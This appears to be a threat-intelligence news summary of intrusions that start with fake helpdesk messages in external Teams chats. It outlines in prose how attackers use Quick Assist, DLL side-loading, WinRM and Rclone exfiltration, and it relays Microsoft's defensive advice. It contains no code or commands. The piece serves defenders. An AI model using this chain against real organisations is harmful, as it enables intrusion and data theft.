Attackers weaponize external Teams chats to impersonate helpdesk and hijack endpoints

Microsoft is tracking a rise in intrusions that begin with cross-tenant Teams messages from actors posing as internal IT or helpdesk staff. The social engineering pitch is routine — an account issue, a pending security update — but the payoff is a Quick Assist remote session that hands the attacker direct control of the victim’s workstation. From that foothold, the operators run reconnaissance through cmd and PowerShell, then drop a payload bundle into user-writable paths like ProgramData and execute it via DLL side-loading through signed binaries from vendors such as Autodesk and Adobe, so C2 traffic rides out over HTTPS alongside normal telemetry.

Lateral movement leans entirely on native tooling: WinRM to pivot to domain-joined hosts and domain controllers, Registry edits for persistence, and additional remote management agents planted on reachable systems. Exfiltration runs through Rclone to external cloud storage, with filters applied to pull only high-value data and keep transfer volumes low enough to blend into legitimate IT activity.

The chain is notable less for novelty than for how cleanly it collapses into the noise floor of a normal enterprise. Every stage — Teams, Quick Assist, signed-binary execution, WinRM, cloud sync — is a tool defenders already allow. Microsoft’s guidance (treat external Teams contacts as untrusted, constrain remote assistance tools, scope WinRM) is really an admission that the detection surface for this pattern lives in policy and behavioral analytics, not signatures.